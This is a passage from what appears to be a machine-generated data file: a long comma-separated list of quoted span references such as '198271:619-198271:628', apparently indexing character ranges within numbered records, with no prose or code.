"198271:619-198271:628", "198271:631-198271:791", "198271:793-198271:797", "198272:1-198272:185", "198272:188-198272:245",
"198272:248-198272:314", "198272:317-198272:433", "198272:436-198272:444", "198272:454-198272:620", "198346:44-198346:47",
"198372:57-198372:110", "198485:68-198485:109", "198485:112-198485:134", "198485:136-198485:181", "198485:184-198485:239",
"198487:1-198487:145", "198487:147-198487:514", "198487:517-198487:668", "198487:671-198487:733", "198487:736-198487:757",
"198487:760-198487:852", "198487:854-198487:994", "198487:997-198487:1434", "198487:1437-198487:1610", "198522:65-198522:144",
"198522:147-198522:208", "198941:102-198941:189", "198941:191-198941:220", "198941:222-198941:241", "198941:243-198941:249",
"198941:252-198941:284", "198954:108-198954:156", "198954:159-198954:277", "198955:1-198955:45", "198955:47-198955:50",
"198955:53-198955:220", "198955:223-198955:269", "198955:271-198955:284", "198955:286-198955:338", "198955:340-198955:580",
"198955:583-198955:742", "198955:744-198955:910", "198955:913-198955:946", "198955:949-198955:1162", "198955:1165-198955:1169",
"198955:1172-198955:1182", "198955:1185-198955:1188", "198955:1190-198955:1246", "198955:1249-198955:1304", "198955:1306-198955:1467",
"198955:1470-198955:1485", "198955:1487-198955:1552", "198969:58-198969:81", "198969:84-198969:247", "198969:249-198969:323",
"198969:325-198969:365", "198969:367-198969:413", "198969:416-198969:466", "198969:468-198969:643", "198969:646-198969:918",
"198969:920-198969:1011", "198969:1013-198969:1175", "198969:1178-198969:1236", "198969:1239-198969:1253", "199008:75-199008:93",
"199008:95-199008:121", "199008:124-199008:208", "199008:211-199008:331", "199008:333-199008:373", "199008:376-199008:482",
"199008:485-199008:605", "199008:608-199008:644", "199011:1-199011:11", "199011:13-199011:24", "199021:59-199021:88",
"199021:91-199021:128", "199021:130-199021:133", "199021:136-199021:309", "199021:311-199021:333", "199021:335-199021:410",
"199021:414-199021:469", "199021:471-199021:533", "199021:535-199021:563", "199021:565-199021:1223", "199021:1226-199021:1479",
"199021:1481-199021:1494", "199318:65-199318:138", "199319:1-199319:7", "199319:9-199319:223", "199319:226-199319:277",
"199319:280-199319:348", "199319:351-199319:358", "199319:360-199319:422", "199319:424-199319:490", "199319:492-199319:493",
"199319:496-199319:612", "199319:615-199319:642", "199319:645-199319:720", "199319:723-199319:728", "199319:730-199319:731",
"199319:734-199319:741", "199319:744-199319:752", "199319:754-199319:943", "199319:945-199319:997", "199336:1-199336:33",
"199336:36-199336:122", "199336:125-199336:231", "199336:234-199336:614", "199336:617-199336:789", "199336:791-199336:977",
"199356:95-199356:121", "199356:123-199356:168", "199356:171-199356:205", "199356:208-199356:231", "199409:25-199409:54",
"199409:56-199409:89", "199409:91-199409:204", "199409:206-199409:290", "199409:293-199409:583", "199409:586-199409:602",
"199409:604-199409:1014", "199409:1016-199409:1300", "199428:61-199428:197", "199428:200-199428:210", "199428:212-199428:382",
"199428:387-199428:414", "199428:417-199428:436", "199428:439-199428:530", "199428:533-199428:648", "199429:1-199429:28",
"199429:30-199429:36", "199429:39-199429:55", "199429:58-199429:101", "199429:103-199429:148", "199429:151-199429:154",
"199435:63-199435:106", "199435:109-199435:261", "199435:263-199435:579", "199435:582-199435:654", "199435:656-199435:696",
"199435:699-199435:1034", "199435:1037-199435:1144", "199435:1147-199435:1327", "199435:1330-199435:1411", "199435:1414-199435:1431",
"199435:1434-199435:1441", "199435:1444-199435:1487", "199435:1489-199435:1610", "199436:1-199436:113", "199436:116-199436:254",
"199436:257-199436:675", "199436:678-199436:748", "199564:1-199564:3", "199569:1-199569:2", "199569:5-199569:136",
"199569:139-199569:367", "199570:1-199570:17", "199571:1-199571:184", "199571:186-199571:360", "199571:363-199571:561",
"199572:1-199572:317", "199573:1-199573:22", "199574:1-199574:53", "199574:56-199574:153", "199574:156-199574:246",
"199608:60-199608:157", "199608:159-199608:209", "199608:211-199608:341", "199608:344-199608:390", "199608:392-199608:461",
"199608:464-199608:800", "199608:802-199608:1064", "199608:1067-199608:1392", "199608:1395-199608:1630", "199608:1633-199608:1904",
"199608:1907-199608:1962", "199608:1965-199608:2252", "199608:2255-199608:2422", "199698:72-199698:94", "199698:96-199698:127",
"199699:1-199699:154", "199699:157-199699:169", "199699:172-199699:410", "199699:412-199699:756", "199703:1-199703:94",
"199703:97-199703:482", "199703:485-199703:529", "199739:66-199739:133", "199751:103-199751:119", "199751:121-199751:127",
"199752:1-199752:141", "199752:144-199752:180", "199752:182-199752:186", "199752:188-199752:211", "199752:214-199752:322",
"199753:1-199753:59", "199754:1-199754:203", "199754:205-199754:325", "199754:328-199754:457", "199754:459-199754:607",
"199754:610-199754:613", "199754:615-199754:806", "199754:808-199754:998", "199804:78-199804:88", "199804:90-199804:181",
"199804:183-199804:235", "199804:238-199804:278", "199804:281-199804:290", "199804:292-199804:519", "199804:522-199804:575",
"199804:577-199804:628", "199804:631-199804:632", "199812:70-199812:141", "199812:144-199812:163", "199812:182-199812:211",
"199812:214-199812:471", "199812:474-199812:505", "199812:508-199812:557", "199812:560-199812:571", "199812:574-199812:623",
"199812:626-199812:751", "199812:754-199812:796", "199832:58-199832:62", "199832:65-199832:118", "199832:121-199832:139",
"199832:142-199832:286", "199833:1-199833:13", "199833:16-199833:103", "199833:105-199833:250", "199833:253-199833:493",
"199833:496-199833:794", "199833:797-199833:1032", "199833:1034-199833:1185", "199833:1188-199833:1239", "199834:1-199834:9",
"199834:11", "199834:14-199834:18", "199834:21-199834:54", "199834:56-199834:57", "199834:62-199834:65",
"199834:69-199834:284", "199834:286-199834:503", "199834:505-199834:942", "199862:59-199862:141", "199864:1-199864:87",
"199864:89", "199864:92-199864:103", "199864:106-199864:372", "199864:374-199864:385", "199864:388-199864:486",
"199867:1-199867:134", "199867:136-199867:172", "199867:174-199867:218", "199867:221-199867:320", "199868:1-199868:21",
"199875:70-199875:150", "199875:152-199875:334", "199876:1-199876:19", "199876:22-199876:95", "199876:97-199876:249",
"199876:252-199876:272", "199876:274-199876:340", "199876:343-199876:362", "199876:365-199876:376", "199877:1-199877:173",
"199877:175-199877:605", "199877:607-199877:701", "199877:703-199877:871", "199960:72-199960:139", "199960:141-199960:197",
"199960:204-199960:232", "199960:235-199960:363", "199960:365-199960:367", "199960:370-199960:380", "199960:383-199960:459",
"199960:461-199960:466", "199960:469-199960:485", "199961:1-199961:211", "199961:213-199961:287", "199967:60-199967:120",
"199967:122-199967:170", "199967:172-199967:198", "199973:73-199973:89", "200041:62-200041:83", "200041:85-200041:157",
"200041:162-200041:274", "200041:277-200041:318", "200041:321-200041:335", "200041:337-200041:386", "200041:388-200041:389",
"200041:392-200041:400", "200041:402-200041:568", "200041:571-200041:593", "200041:595-200041:646", "200041:649-200041:728",
"200041:731-200041:860", "200041:862-200041:930", "200041:932-200041:1096", "200042:1-200042:110", "200042:112-200042:536",
"200049:1-200049:177", "200075:76-200075:139", "200075:142-200075:232", "200075:256-200075:326", "200075:329-200075:422",
"200075:425-200075:431", "200075:434-200075:500", "200075:502-200075:605", "200091:67", "200091:70-200091:151",
"200091:154-200091:172", "200091:174-200091:187", "200091:190-200091:196", "200091:199-200091:201", "200091:204-200091:425",
"200091:428-200091:535", "200091:537-200091:607", "200091:610-200091:879", "200091:881-200091:943", "200091:946-200091:999",
"200091:1001-200091:1025", "200091:1027-200091:1132", "200091:1135-200091:1339", "200091:1341-200091:1433", "200091:1435-200091:1450",
"200091:1453-200091:1523", "200091:1526-200091:1664", "200091:1667-200091:1680", "200091:1683-200091:1710", "200152:74-200152:116",
"200160:52-200160:68", "200161:1-200161:97", "200161:100-200161:112", "200174:81-200174:84", "200177:1-200177:56",
"200178:1-200178:38", "200180:1-200180:18", "200186:1-200186:3", "200186:6-200186:24", "200188:1-200188:24",
"200188:27-200188:28", "200188:31-200188:76", "200188:79-200188:271", "200188:274-200188:352", "200190:1-200190:4",
"200190:6-200190:76", "200190:79-200190:143", "200190:146-200190:159", "200190:162-200190:256", "200190:258-200190:321",
"200190:324-200190:401", "200190:403-200190:453", "200190:456-200190:457", "200190:460-200190:565", "200190:567-200190:588",
"200190:591", "200190:593-200190:595", "200190:597-200190:646", "200190:649-200190:878", "200229:1-200229:33",
"200229:41-200229:219", "200229:222-200229:244", "200229:247-200229:290", "200229:293-200229:624", "200229:627-200229:629",
"200243:69-200243:103", "200243:106-200243:139", "200244:3-200244:304", "200244:307-200244:442", "200244:445-200244:507",
"200244:510-200244:619", "200245:1-200245:103", "200245:105-200245:128", "200245:131-200245:248", "200245:251-200245:357",
"200368:72-200368:180", "200369:1-200369:5", "200369:8-200369:61", "200369:64-200369:360", "200369:363-200369:439",
"200369:441-200369:578", "200369:580-200369:603", "200369:606-200369:684", "200369:686", "200381:8-200381:15",
"200381:18-200381:36", "200381:38-200381:89", "200381:91-200381:195", "200466:134-200466:274", "200473:96-200473:157",
"200473:159-200473:224", "200473:226-200473:304", "200473:306-200473:469", "200473:472-200473:524", "200473:527-200473:542",
"200473:545-200473:619", "200473:622-200473:688", "200473:691-200473:730", "200473:733-200473:738", "200473:740-200473:1324",
"200491:87-200491:107", "200491:110-200491:149", "200491:152-200491:157", "200491:160-200491:197", "200491:199-200491:237",
"200491:240-200491:270", "200491:273", "200491:276-200491:334", "200491:336-200491:360", "200491:363-200491:419",
"200515:97-200515:183", "200519:1-200519:111", "200519:114-200519:126", "200519:129-200519:136", "200519:138-200519:224",
"200519:227-200519:258", "200519:261-200519:350", "200519:353-200519:611", "200519:613-200519:747", "200525:77-200525:149",
"200525:151-200525:164", "200525:166-200525:190", "200525:193-200525:276", "200525:278-200525:311", "200525:314-200525:464",
"200525:467-200525:488", "200525:491-200525:674", "200525:676-200525:704", "200525:707-200525:755", "200525:757-200525:895",
"200525:898-200525:937", "200525:939-200525:990", "200532:1-200532:37", "200599:75-200599:129", "200599:132-200599:137",
"200600:1-200600:183", "200600:186-200600:299", "200600:302-200600:313", "200600:316-200600:324", "200600:327-200600:334",
"200600:336-200600:397", "200600:399-200600:417", "200600:420-200600:526", "200600:529-200600:591", "200600:594-200600:596",
"200600:598-200600:609", "200600:611-200600:660", "200600:663-200600:823", "200600:826-200600:900", "200600:902-200600:943",
"200600:945-200600:1139", "200961:1-200961:115", "200976:94-200976:164", "200990:75-200990:143", "200991:1-200991:42",
"200991:44", "200991:47-200991:80", "200991:83-200991:175", "200991:178-200991:181", "200991:184-200991:252",
"200991:255-200991:632", "200991:635-200991:916", "200991:918-200991:1017", "200991:1019-200991:1048", "200992:1-200992:405",
"200992:408-200992:434", "200992:436-200992:581", "201062:78-201062:268", "201097:83-201097:136", "201097:138-201097:245",
"201097:248-201097:300", "201097:303-201097:370", "201097:372-201097:429", "201097:432-201097:497", "201114:1-201114:14",
"201115:1-201115:73", "201159:70-201159:211", "201164:1-201164:8", "201164:10-201164:94", "201164:96-201164:125",
"201164:128-201164:178", "201164:180-201164:198", "201164:200-201164:271", "201164:274-201164:416", "201164:418",
"201168:1-201168:37", "201168:39-201168:275", "201168:278-201168:481", "201168:483-201168:558", "201168:560-201168:730",
"201173:1-201173:194", "201173:197-201173:586", "201174:1-201174:214", "201174:216-201174:263", "201174:265-201174:339",
"201174:342-201174:451", "201191:75-201191:98", "201191:100-201191:216", "201191:218-201191:389", "201191:392-201191:492",
"201191:494-201191:506", "201191:509-201191:585", "201191:587-201191:594", "201191:597-201191:607", "201191:609-201191:794",
"201191:796-201191:838", "201191:841-201191:974", "201191:977-201191:1105", "201191:1108-201191:1117", "201191:1120-201191:1382",
"201191:1385-201191:1386", "201193:1-201193:19", "201196:1-201196:238", "201196:241-201196:278", "201196:286-201196:299",
"201196:302-201196:338", "201196:341-201196:515", "201196:518-201196:720", "201196:723-201196:789", "201196:803-201196:841",
"201197:1-201197:23", "201202:1-201202:437", "201229:1-201229:5", "201229:8-201229:26", "201229:29-201229:73",
"201278:62-201278:163", "201278:166-201278:229", "201278:232-201278:256", "201278:259-201278:316", "201278:318-201278:595",
"201278:598-201278:938", "201278:942-201278:974", "201278:976-201278:1160", "201278:1163-201278:1304", "201278:1306-201278:1793",
"201278:1796-201278:1802", "201278:1805-201278:1906", "201278:1909-201278:1929", "201278:1932-201278:2174", "201554:70-201554:86",
"201554:88-201554:114", "201554:116-201554:126", "201602:76-201602:81", "201602:83-201602:194", "201602:196-201602:494",
"201602:496-201602:614", "201602:617-201602:635", "201611:87-201611:145", "201611:149-201611:182", "201611:184-201611:186",
"201613:1-201613:42", "201613:44-201613:49", "201613:53-201613:210", "201613:213-201613:215", "201613:218-201613:225",
"201613:228-201613:646", "201624:83-201624:92", "201624:95-201624:240", "201624:270", "201625:211-201625:312",
"201625:315-201625:348", "201625:351-201625:416", "201625:418-201625:588", "201625:591-201625:671", "201625:673-201625:758",
"201625:760-201625:791", "201625:793-201625:944", "201657:77-201657:93", "201657:95-201657:108", "201657:110-201657:118",
"201658:1-201658:19", "201658:21-201658:118", "201658:121-201658:136", "201658:139-201658:288", "201668:78-201668:157",
"201669:1-201669:9", "201669:12-201669:136", "201669:139-201669:141", "201669:143-201669:165", "201671:1-201671:120",
"201671:122-201671:174", "201671:177-201671:462", "201671:464-201671:482", "201671:485-201671:499", "201671:501-201671:545",
"201671:547-201671:571", "201671:574-201671:614", "201671:617-201671:766", "201671:768-201671:896", "201671:899-201671:911",
"201671:914-201671:1007", "201678:1-201678:120", "201679:1-201679:110", "201679:112-201679:241", "201679:244-201679:298",
"201679:302-201679:321", "201679:324-201679:461", "201679:463-201679:483", "201692:78-201692:81", "201692:83-201692:179",
"201705:65-201705:73", "201705:75-201705:109", "201705:111-201705:187", "201706:1-201706:62", "201707:1-201707:23",
"201707:26-201707:42", "201707:45-201707:115", "201707:118-201707:130", "201707:133-201707:160", "201707:163-201707:276",
"201707:279-201707:471", "201707:473-201707:511", "201707:514-201707:545", "201707:547-201707:570", "201707:572-201707:622",
"201707:625-201707:735", "201707:738-201707:806", "201707:809-201707:876", "201707:879-201707:964", "201708:1-201708:79",
"201718:58-201718:108", "201727:67-201727:185", "201729:6-201729:20", "201729:22-201729:75", "201729:77-201729:126",
"201729:129-201729:154", "201729:156-201729:216", "201729:219-201729:244", "201794:58-201794:94", "201802:68-201802:209",
"201802:211-201802:214", "201802:216-201802:220", "201802:223-201802:288", "201802:290-201802:296", "201816:1-201816:72",
"201816:74-201816:105", "201816:107-201816:157", "201817:1-201817:274", "201818:1", "201819:1-201819:94",
"201819:96-201819:241", "201824:1-201824:139", "201824:141-201824:176", "201824:179-201824:286", "201824:289-201824:492",
"202012:98-202012:121", "202012:126-202012:131", "202013:1-202013:2", "202013:5-202013:35", "202013:38-202013:57",
"202014:1-202014:5", "202014:8-202014:14", "202014:16-202014:18", "202014:20-202014:77", "202014:79-202014:102",
"202014:104-202014:174", "202014:177-202014:190", "202014:192-202014:196", "202016:1-202016:48", "202016:51-202016:134",
"202016:137-202016:177", "202016:179-202016:743", "202016:745-202016:831", "202016:834-202016:890", "202016:893-202016:896",
"202016:898-202016:932", "202016:934-202016:1010", "202044:84-202044:101", "202044:104-202044:266", "202044:268-202044:461",
"202044:463-202044:466", "202045:1-202045:30", "202045:33-202045:72", "202045:75-202045:528", "202045:531-202045:601",
"202045:603-202045:785", "202045:788-202045:809", "202045:822-202045:823", "202054:6-202054:266", "202054:268-202054:489",
"202054:492-202054:605", "202054:608-202054:631", "202060:76-202060:142", "202060:144-202060:154", "202060:156-202060:244",
"202060:246-202060:497", "202060:499-202060:642", "202060:644-202060:682", "202060:684-202060:743", "202060:746-202060:936",
"202074:66-202074:174", "202075:1-202075:18", "202075:21-202075:187", "202075:189-202075:214", "202075:217-202075:247",
"202075:250-202075:342", "202075:345-202075:406", "202075:409-202075:497", "202075:500-202075:537", "202075:539",
"202075:542-202075:560", "202075:562-202075:615", "202075:618-202075:628", "202084:83-202084:156", "202084:159-202084:177",
"202084:179-202084:180", "202084:182-202084:239", "202087:1-202087:25", "202087:28-202087:208", "202087:210-202087:357",
"202087:359-202087:652", "202087:655-202087:853", "202087:856-202087:1093", "202088:1-202088:286", "202093:1-202093:104",
"202093:107-202093:320", "202093:322-202093:360", "202116:59-202116:60", "202178:67-202178:78", "202178:80-202178:88",
"202178:91-202178:177", "202178:180-202178:186", "202178:188-202178:337", "202178:340-202178:377", "202178:379-202178:425",
"202178:428-202178:475", "202178:478-202178:548", "202178:551-202178:717", "202178:720-202178:965", "202178:967-202178:1444",
"202178:1447-202178:1505", "202178:1508-202178:1519", "202178:1522-202178:1555", "202205:94-202205:114", "202209:1-202209:48",
"202209:51-202209:142", "202237:39-202237:128", "202237:131", "202237:134-202237:219", "202237:222-202237:235",
"202237:238-202237:275", "202237:277-202237:289", "202237:291-202237:316", "202237:319-202237:419", "202237:422-202237:538",
"202237:540-202237:936", "202237:939-202237:950", "202237:952-202237:976", "202237:979-202237:1079", "202272:76-202272:112",
"202272:115-202272:141", "202272:144-202272:185", "202272:188-202272:205", "202272:208-202272:305", "202272:307-202272:313",
"202272:315-202272:371", "202272:436-202272:480", "202272:483-202272:555", "202272:558-202272:577", "202272:579-202272:683",
"202272:686-202272:705", "202272:707-202272:740", "202272:742-202272:890", "202272:937-202272:1295", "202272:1299-202272:1481",
"202299:68-202299:84", "202299:87-202299:141", "202299:143-202299:193", "202299:196-202299:358", "202299:361-202299:379",
"202299:382-202299:414", "202299:416-202299:452", "202299:455-202299:555", "202305:1-202305:89", "202305:92-202305:130",
"202305:133-202305:323", "202314:67-202314:104", "202314:107-202314:265", "202314:268-202314:278", "202328:46-202328:89",
"202328:92-202328:156", "202328:158-202328:276", "202328:278-202328:291", "202328:294-202328:434", "202328:437-202328:460",
"202328:463-202328:586", "202328:588-202328:610", "202328:612-202328:614", "202333:1-202333:235", "202389:81-202389:182",
"202389:185-202389:190", "202389:192-202389:199", "202469:87-202469:158", "202469:160-202469:174", "202469:177-202469:352",
"202472:1-202472:96", "202472:99-202472:112", "202477:1-202477:129", "202477:131-202477:150", "202478:1-202478:177",
"202478:180-202478:183", "202478:186-202478:219", "202478:222-202478:360", "202478:362-202478:506", "202478:509-202478:531",
"202478:534-202478:718", "202478:720-202478:927", "202478:929-202478:973", "202478:975-202478:1029", "202478:1031-202478:1186",
"202478:1189-202478:1212", "202478:1215-202478:1248", "202504:77-202504:96", "202504:99-202504:133", "202504:135-202504:182",
"202504:184-202504:211", "202504:213-202504:241", "202504:243-202504:392", "202504:395-202504:527", "202504:529-202504:617",
"202504:620-202504:715", "202504:718-202504:763", "202504:766-202504:1172", "202504:1174-202504:1247", "202504:1250-202504:1471",
"202504:1474-202504:1679", "202504:1682-202504:1704", "202972:1-202972:30", "202972:33-202972:184", "202972:186-202972:290",
"202972:292-202972:295", "202972:298-202972:371", "202972:374-202972:429", "202972:431-202972:544", "202973:1-202973:234",
"202973:237-202973:305", "202973:308-202973:437", "202973:439-202973:530", "202973:532-202973:541", "202973:544-202973:552",
"202973:555-202973:851", "202973:853-202973:1408", "203002:77-203002:128", "203002:130-203002:141", "203002:144-203002:207",
"203002:209-203002:267", "203002:270-203002:360", "203002:362-203002:501", "203002:504-203002:641", "203002:643-203002:669",
"203002:671", "203002:674-203002:717", "203002:720-203002:1034", "203002:1037-203002:1070", "203002:1073-203002:1370",
"203002:1372-203002:1392", "203002:1395-203002:1410", "203002:1413-203002:1596", "203709:1-203709:121", "203742:1-203742:29",
"203777:103-203777:113", "203830:82-203830:182", "203832:1-203832:11", "203833:1-203833:70", "203833:73-203833:128",
"203834:1-203834:40", "203835:1-203835:70", "203835:73-203835:358", "203853:122-203853:222", "203894:82-203894:272",
"203894:275-203894:477", "203894:480-203894:902", "203894:905-203894:1319", "203909:79-203909:113", "203909:116-203909:117",
"203909:120-203909:140", "203909:143-203909:382", "203912:1-203912:306", "203912:308-203912:566", "203912:569-203912:609",
"203912:611-203912:698", "203912:701-203912:820", "203912:823-203912:865", "203912:867-203912:1033", "203912:1035-203912:1321",
"203987:1-203987:9", "203987:12-203987:241", "203987:243-203987:339", "203987:342-203987:781", "203987:784-203987:1014",
"203992:1-203992:15", "203994:1-203994:56", "203994:59-203994:136", "203994:139-203994:304", "203994:306-203994:342",
"203994:344-203994:425", "204100:117-204100:139", "204101:1-204101:74", "204113:82-204113:96", "204113:98-204113:102",
"204113:105-204113:127", "204113:129-204113:191", "204113:194-204113:258", "204113:261-204113:327", "204113:329-204113:388",
"204113:390-204113:400", "204113:402-204113:583", "204113:585-204113:690", "204114:1-204114:358", "204238:23-204238:52",
"204238:55", "204250:92-204250:118", "204250:121-204250:177", "204250:179-204250:285", "204250:287-204250:336",
"204250:339-204250:400", "204250:403-204250:521", "204250:524-204250:543", "204250:546-204250:682", "204250:684-204250:801",
"204511:1-204511:56", "204541:5-204541:39", "204541:42", "204541:44-204541:139", "204541:142-204541:149",
"204541:151-204541:204", "204544:1-204544:11", "204544:13-204544:93", "204544:96-204544:195", "204544:197-204544:224",
"204544:226-204544:334", "204544:337-204544:426", "204552:1-204552:9", "204553:1-204553:51", "204553:53-204553:60",
"204553:63-204553:101", "204554:1-204554:5", "204554:7-204554:221", "204554:224-204554:455", "204554:458-204554:470",
"204554:472-204554:481", "204554:483-204554:514", "204555:1-204555:329", "204555:331-204555:334", "204563:91-204563:99",
"204563:102-204563:178", "204563:180-204563:219", "204563:222-204563:229", "204563:231-204563:364", "204563:366",
"204563:369-204563:470", "204563:473-204563:524", "204563:527-204563:571", "204564:1-204564:84", "204564:87-204564:89",
"204564:92-204564:159", "204564:161-204564:187", "204564:190-204564:191", "204564:193-204564:293", "204564:296-204564:315",
"204564:317-204564:340", "204564:343-204564:427", "204564:429-204564:434", "204564:437-204564:735", "204564:737-204564:855",
"204564:858-204564:1206", "204564:1209-204564:1248", "204564:1251-204564:1284", "204565:1-204565:48", "204566:1-204566:12",
"204567:1-204567:38", "204576:49-204576:192", "204576:195-204576:301", "204577:1-204577:46", "204577:49-204577:64",
"204577:67-204577:105", "204577:107-204577:170", "204577:173-204577:181", "204577:183-204577:193", "204577:196-204577:653",
"204577:656-204577:669", "204577:671-204577:740", "204577:742-204577:913", "204577:915-204577:1057", "204577:1059-204577:1115",
"204577:1117-204577:1282", "204599:73-204599:83", "204599:85-204599:94", "204599:97-204599:121", "204599:124-204599:125",
"204599:128-204599:173", "204599:175-204599:240", "204599:243-204599:245", "204599:248-204599:264", "204599:266-204599:292",
"204599:294-204599:334", "204601:1-204601:25", "204601:28-204601:62", "204601:65-204601:80", "204601:83-204601:89",
"204601:92-204601:290", "204601:292-204601:563", "204601:565-204601:591", "204601:593-204601:652", "204601:655-204601:780",
"204601:783-204601:812", "204601:814-204601:892", "204601:894-204601:984", "204601:986-204601:1003", "204601:1006-204601:1038",
"204601:1040-204601:1088", "204601:1091-204601:1102", "204601:1105-204601:1161", "204601:1164-204601:1250", "205086:95-205086:149",
"205111:88-205111:390", "205111:392-205111:441", "205111:444-205111:446", "205158:81-205158:289", "205158:292-205158:313",
"205158:315-205158:473", "205158:476-205158:591", "205158:594-205158:595", "205158:597-205158:612", "205158:615-205158:663",
"205158:665-205158:667", "205158:672-205158:685", "205158:687-205158:733", "205193:80-205193:109", "205193:111-205193:349",
"205193:352-205193:486", "205193:488-205193:650", "205193:652-205193:712", "205193:714-205193:902", "205217:1-205217:12",
"205217:16-205217:111", "205217:113-205217:171", "205217:174-205217:250", "205217:253-205217:318", "205233:94-205233:153",
"205236:1-205236:190", "205236:193-205236:207", "205236:209-205236:260", "205236:263-205236:331", "205236:334-205236:352",
"205238:1-205238:6", "205238:9-205238:199", "205238:202-205238:254", "205238:256-205238:304", "205238:306-205238:355",
"205238:358-205238:381", "205238:384-205238:596", "205238:598-205238:617", "205303:35-205303:54", "205303:90-205303:132",
"205303:135-205303:144", "205310:76-205310:306", "205310:309-205310:313", "205310:316", "205310:319-205310:321",
"205310:324-205310:457", "205310:460-205310:559", "205311:1-205311:85", "205311:88-205311:92", "205311:95-205311:183",
"205311:186-205311:395", "205311:397-205311:592", "205311:595-205311:910", "205311:913-205311:1260", "205339:71-205339:175",
"205339:178-205339:213", "205339:216-205339:230", "205339:233-205339:262", "205339:265-205339:404", "205344:1-205344:83",
"205344:86-205344:104", "205344:106-205344:359", "205344:362-205344:431", "205344:433-205344:949", "205344:951-205344:967",
"205344:969-205344:1127", "205344:1129-205344:1346", "205344:1348-205344:1586", "205515:82-205515:201", "205515:203-205515:216",
"205519:1-205519:47", "205519:50-205519:172", "205519:175-205519:367", "205519:370-205519:386", "205519:389-205519:472",
"205526:1-205526:269", "205526:272-205526:277", "205526:280-205526:332", "205614:1-205614:4", "205614:7-205614:40",
"205617:1-205617:29", "205617:32-205617:102", "205617:105-205617:123", "205617:125-205617:140", "205617:143-205617:264",
"205617:266-205617:448", "205617:451-205617:532", "205617:534-205617:547", "205618:1-205618:12", "205620:1-205620:175",
"205666:60-205666:119", "205666:122-205666:165", "205666:168-205666:259", "205666:261-205666:322", "205666:325-205666:578",
"205666:580-205666:594", "205666:597-205666:721", "205666:724-205666:739", "205667:1-205667:165", "205667:168-205667:282",
"205667:285-205667:318", "205667:321-205667:412", "205667:415-205667:689", "205667:692-205667:751", "205667:754-205667:774",
"205667:777-205667:1109", "205683:76-205683:82", "205683:85-205683:178", "205683:181-205683:198", "205683:201-205683:305",
"205690:1-205690:40", "205694:1-205694:205", "205694:208-205694:230", "205694:233-205694:347", "205694:350-205694:452",
"205694:455-205694:593", "205694:595-205694:890", "205718:49-205718:75", "205718:78-205718:97", "205718:100-205718:103",
"205718:105-205718:176", "205718:178-205718:338", "205718:341-205718:361", "205718:363-205718:524", "205718:527-205718:531",
"205718:534-205718:589", "205718:591-205718:694", "205774:1-205774:80", "205777:1-205777:8", "205781:1-205781:89",
"205781:91-205781:197", "205781:200-205781:502", "205826:80-205826:232", "205826:235-205826:303", "205826:306-205826:468",
"205833:84-205833:86", "205833:89-205833:121", "205833:123-205833:155", "205833:157-205833:165", "205833:167-205833:173",
"205833:176-205833:219", "205833:221-205833:267", "205833:270-205833:312", "205833:315-205833:346", "205833:350-205833:355",
"205833:360-205833:366", "205834:1-205834:12", "205834:14-205834:195", "205908:68-205908:200", "205908:202-205908:209",
"205921:22-205921:73", "205921:76-205921:268", "205921:271-205921:394", "205921:397-205921:401", "205921:410-205921:428",
"205921:431-205921:498", "205921:500-205921:571", "205921:574-205921:779", "205921:782-205921:853", "206066:89-206066:146",
"206088:86-206088:159", "206088:161-206088:178", "206088:181-206088:199", "206088:202-206088:286", "206102:83-206102:116",
"206102:120-206102:130", "206102:133-206102:208", "206102:211-206102:235", "206102:238-206102:246", "206102:249-206102:278",
"206102:281-206102:349", "206187:107-206187:169", "206187:172-206187:242", "206187:245-206187:288", "206187:290-206187:340",
"206187:343-206187:427", "206187:429-206187:435", "206187:437-206187:486", "206187:489-206187:569", "206187:571-206187:647",
"206187:649-206187:662", "206187:664-206187:708", "206188:1-206188:40", "206188:42-206188:55", "206199:1-206199:75",
"206199:77-206199:82", "206199:85-206199:114", "206207:82-206207:130", "206207:132-206207:176", "206207:179-206207:194",
"206207:196-206207:388", "206207:390-206207:419", "206207:422-206207:447", "206207:450-206207:569", "206207:572-206207:690",
"206208:1-206208:470", "206208:472-206208:518", "206210:11-206210:25", "206210:28-206210:275", "206210:277-206210:298",
"206210:300-206210:383", "206210:386-206210:466", "206243:62-206243:169", "206243:172-206243:196", "206243:199-206243:354",
"206243:357-206243:433", "206243:435-206243:448", "206243:451-206243:533", "206243:536-206243:554", "206243:557-206243:723",
"206243:726-206243:905", "206245:1-206245:62", "206246:1-206246:14", "206246:16-206246:237", "206246:240-206246:285",
"206246:288-206246:407", "206246:412-206246:676", "206246:678-206246:704", "206246:706-206246:785", "206246:787-206246:962",
"206246:965-206246:997", "206246:1000-206246:1198", "206246:1201-206246:1290", "206257:1-206257:29", "206258:1-206258:36",
"206258:39-206258:223", "206258:226-206258:249", "206302:1-206302:8", "206302:11-206302:33", "206302:36-206302:44",
"206302:47-206302:82", "206302:84-206302:108", "206302:110-206302:149", "206302:151-206302:186", "206302:189-206302:229",
"206302:231-206302:232", "206302:234-206302:241", "206302:243-206302:276", "206303:1-206303:19", "206303:23-206303:286",
"206304:1-206304:4", "206304:6-206304:62", "206331:91-206331:222", "206331:225-206331:312", "206389:88-206389:185",
"206389:187-206389:249", "206389:252-206389:272", "206389:275-206389:392", "206391:1-206391:55", "206391:57-206391:91",
"206401:69-206401:90", "206401:92-206401:194", "206401:197-206401:210", "206401:212-206401:249", "206401:251-206401:265",
"206401:267-206401:409", "206446:92-206446:141", "206446:143-206446:159", "206446:162-206446:205", "206446:208-206446:301",
"206446:304-206446:442", "206446:445", "206446:448-206446:474", "206446:476-206446:616", "206446:619-206446:872",
"206446:874-206446:910", "206446:912-206446:948", "206446:950-206446:989", "206446:992-206446:1030", "206446:1033-206446:1075",
"206446:1109-206446:1149", "206448:1-206448:143", "206448:145-206448:559", "206448:561-206448:1170", "206448:1173-206448:1231",
"206448:1235-206448:1237", "206466:24-206466:137", "206466:140-206466:277", "206466:280-206466:296", "206466:299-206466:303",
"206466:306-206466:405", "206466:407-206466:419", "206466:422-206466:477", "206466:480-206466:511", "206466:514-206466:676",
"206476:73-206476:129", "206476:133-206476:137", "206476:140-206476:141", "206476:143-206476:219", "206477:1-206477:14",
"206477:16-206477:31", "206477:33-206477:41", "206477:44-206477:51", "206477:53-206477:70", "206477:73-206477:75",
"206477:77-206477:89", "206477:91-206477:94", "206477:97-206477:115", "206477:118-206477:184", "206478:1-206478:27",
"206478:29-206478:136", "206478:139-206478:144", "206484:73-206484:95", "206484:98-206484:133", "206484:136-206484:163",
"206484:166-206484:186", "206484:189-206484:384", "206484:387-206484:463", "206484:465-206484:551", "206484:554",
